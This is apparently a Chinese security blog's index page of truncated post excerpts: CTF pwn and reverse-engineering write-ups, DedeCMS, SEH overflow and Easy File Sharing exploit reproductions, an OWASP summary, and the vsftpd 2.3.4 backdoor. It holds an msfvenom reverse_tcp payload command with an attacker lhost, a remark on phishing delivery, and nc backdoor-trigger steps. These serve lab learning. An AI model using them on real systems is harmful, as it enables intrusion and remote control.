Kali渗透测试工具使用
Kali渗透测试工具使用kon-bootJohn RippersqlmapMaltegoAircrackWPScanBeEF
GUET梦极光杯(校赛)线下-PWN题赛后复现
赛后复现比赛的时候脑子短路了(也是基本功不扎实),一题也做不出来,赛后花了1天的时间复现了一下,只能说水平差的还很多。
checkin_revenge输入三个数字满足等式,还是没啥限制,随意构造即可
这里存在明显的栈溢出
但是这一题是开了PIE和RELRO的64位程序,所以我们不能再覆盖got表,
PIE 保护太烦人了,之前没做过栈溢出开PIE的(做题少),但是虽然PIE烦人,但是还是有弱点的:
PIE 保护的一个弱点就是pie不会随机化地址的低12位,通俗点说就是我们十六进制地址的后三位,这样我们才有“文章”可做
现在先整理一下思路:
我们的目的是得到libc中system和/bin.sh的地址
开启了地址随机化,每次运行的基址都不一样,所以得先得到每次程序运行的libc的基址,这里我们利用libc_start_main,我们想办法得到程序中libc_start_main的地址,减去libc中的偏移,得到libc基址,进而获得system等的地址
为了得到libc基址,我们已经让程序正常运行了一次,那我们接下来就是要让程序再出现一次栈溢出漏洞,在这时截获它,让它运行syste ...
dedecms5.7修改前台登陆密码漏洞复现
Dedecms5.7修改前台登陆密码漏洞复现准备工作1.搭建dedecms5.7从网上下载dedecms5.7源码,找到了里面uploads文件夹,改名成dedecms5.7
利用phpstudy在win10本地搭建dedecms网站,将dedecms5.7文件夹置于WWW文件夹下
在浏览器输入localhost/dedecms5.7/install/index.php进行安装
一路按默认继续,直到遇到数据库设定页面:
按照你phpstudy的mysql数据库密码修改后,按继续
到这里先进网站后台
利用默认账号密码admin admin登入
然后在系统选项中找到系统基本参数,再选择会员设置,最后将是否开启会员功能选项改成 是。
最后不要忘了点 确定 保存更改,
到此基本的搭建已经完成。
复现过程先注册一个账号,
随意填写信息,但是注意不要设置安全问题
然后打开url:http://127.0.0.1/dedecms5.7/member/resetpassword.php
输入你想要修改的账号的密码,邮箱随便填写,用burpsuite抓包,:
抓到的包:
将 ...
GUET梦极光杯(校赛)线上 RE部分wp
RE猜ida打开,直接看到flag
.class.class文件用jd.gui打开,定位到关键加密代码,逻辑是个简单的异或0x17,写个脚本解出
脚本:
汇编分析汇编代码,分析逻辑是从栈顶每次取一个字节与ecx进行异或,ecx从1开始,每次加1,当ecx = 28时加密结束,即push进去的每个字节都进行了异或加密,写个脚本
脚本:
注意把push进去的值按后进先出排序,并且因为程序是小端序的原因把每个DWORD数据进行倒序。
Easy_Mazeida32位打开,发现无法F5反编译
仔细观察发现,因为406B51处的代码 call的操作数是一个非法地址,分析上面代码的逻辑,发现程序不可能跳转到406B51处,程序只会跳转到406B52处,故406B51处的代码是花指令,干扰了ida的反编译,我们在406B51处按 U(取消数据类型定义),
发现406B51处的数据为 0E8h 这是call指令的汇编代码,这条指令是常见的花指令,让ida以为要调用一个函数,造成反汇编失败,所以反编译更不能成功,我们把这个数据 NOP 掉,
然后在main函数上按 U,
再按 P(定义该 ...
GUET梦极光杯(校赛)线上 PWN部分wp
PWNCheckinIda打开发现需要输入三个变量满足一个简单的等式,没什么限制随意构造即可
进入vul函数,发现存在栈溢出,偏移为10h,
还找到了后门函数,
坑(关键点): 注意输入数字要用str()包裹,以前做题不常遇到(还是题做少了),这次比赛被这个点坑了一个小时,哭了
EXP:
Arry题目有很多提示:数组越界、got表、可以向下越界也能向上越界(我太菜了,这么多提示还做了半天)
打开ida,发现程序可以通过数组越界查看任意地址里的值并更改它,并且程序已经存在system(“/bin/sh”)
因为程序开了aslr保护(最后三位不变),所以我们要先泄露程序代码段的基址,然后再将printf的got表覆盖成后门函数的地址,
在gdb中调试发现bss段中arry离got段很近,直接地址相减得到负数的偏移,然后获得stack_chk_fail函数的地址,然后用0xFFFFFFFFF000与得到的地址相与得到代码段基址,然后用基址加上偏移计算得到后门函数地址,再利用一次数组越界将printf的got表覆盖成后门函数地址
坑(关键点)1: 这题因为有alsr不能直接bp ...
OWASP Top10 -2021
OWASP Top10 -2021
什么是OWASP?OWASP,开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)是一个非营利组织,不附属于任何企业或财团,它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。
OWASP项目最具权威的就是其“十大安全漏洞列表”(OWASPTop 10),OWASP Top 10不是官方文档或标准,而只是一个被广泛采用的意识文档,被用来分类网络安全漏洞的严重程度,目前被许多漏洞奖励平台和企业安全团队评估错误报告。这个列表总结了Web应用程序最可能、最常见、最危险的十大漏洞,可以帮助IT公司和开发团队规范应用程序开发流程和测试流程,提高Web产品的安全性。
2021-TOP 10 一览
A01:2021-Broken Access Control(损坏的访问控制)从第五位上升到 Web 应用程序安全风险最严重的类别;提供的数据表明,平均 3.81% 的测试应用程序具有一个或多个常见弱点枚举 (CWE),在此风险类别中 CW ...
Windows漏洞学习之栈溢出覆盖SEH
Windows漏洞学习之栈溢出覆盖SEH转载自https://forum.butian.net/share/1007
0x00 简介这篇文章主要是介绍SEH机制以及在实战中怎么利用栈溢出覆盖SEH达到绕过GS保护机制,从而执行你的shellcode。
0x01 SEH介绍Windows 需要它运行的软件能够从发生的错误中恢复,为此,它允许开发人员指定当程序遇到问题(或异常)并编写在出现错误时运行的特殊代码(处理程序)。换句话说,Windows 为开发人员实现了一种结构化的方式来处理他们称之为结构化异常处理程序的异常。
我们实际上可以通过覆盖原始的 SEH 代码来劫持这个过程来运行我们想要的代码。然后,让我们执行代码所需要做的就是通过写入缓冲区的末尾来故意触发错误(异常)。
Windows SEH 实现了一系列代码块来处理异常,作为在单个块无法处理错误的情况下有多个回退选项的一种方式。此代码可以写入软件或操作系统本身。每个程序都有一个 SEH 链,即使是没有开发人员编写的任何错误处理代码的软件。下面有一张关于 SEH 链的图解:
关于SEH的详细介绍我推荐看看这篇博客:https:// ...
Metasploit的简单应用
Metasploit的简单应用测试环境攻击机:Kali-Linux-2021.2-vmware-amd64 192.168.xxx.xxx
靶机:Win7 旗舰版 192.168.xxx.xxx
利用metasploit生成被控端打开kali终端,键入
msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe -o /root/payload.exe
如果不是以root权限运行就加上sudo
现在已经生成了远程控制程序payload.exe(被控端)在我攻击机上的root文件夹里
复制payload.exe到靶机上,实战中应该是制作一个钓鱼网页给受害者下载或者其他方法,这里我就直接复制过去了,复制的过程中我的物理机上的杀软还报毒了,难道说这个远控程序可以打穿虚拟机渗透我的物理机?(开玩笑)
启动主控端在kali终端键入,
msfconsole
打开了msfc控制台后,再键入,
use exploit/multi/handler
这个命令的功能是,使用explot文件夹的子文 ...
Easy File Sharing Web Server 缓冲区溢出漏洞复现
Easy File Sharing Web Server 6.9 缓冲区溢出漏洞漏洞介绍由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进而导致服务器被黑客控制。
复现环境攻击机:Kali-Linux-2021.2-vmware-amd64 192.168.xxx.xxx
靶机:Win7 旗舰版 192.168.xxx.xxx
服务程序:Easy File Sharing Web Server 2018
服务端口: 80
过程靶机准备工作查看靶机的ip地址:
ipconfig
在靶机上安装(一路默认)并且打开 Easy File Sharing Web Server 2018 程序
不购买,选择Try it!
注意到HTTP服务的端口是80端口
kali探测打开kali终端,键入
nmap 目标靶机ip地址/24
发现目标靶机ip打开了80端口,开放了HTTP服务
在终 ...
FTP服务器笑脸漏洞复现
笑脸漏洞—vsftpd 2.3.4漏洞介绍这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有” :) “,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器,漏洞危害巨大。
准备攻击机:kali: 192.xxx.xxx.xxx
靶机:Metasplotable2-Linux: 192.xxx.xxx.xxx
两台虚拟机的网络连接都选择 NAT模式
过程打开Metasplotable2终端,输入以下命令,查看ip地址
ifconfig
kali同理
确认了两台虚拟机处于同一网段
在kali终端,输入
nmap 靶机的ip地址/24
发现靶机打开着21端口
键入以下命令
nmap -sV 靶机的ip地址
这里可以看到靶机的ftp服务的版本信息是 vsftpd 2.3.4,漏洞就在这里
键入
nc 目标靶机ip地址 21user a:) (用户名必须带笑脸即 ":)" )pass 1111 ( ...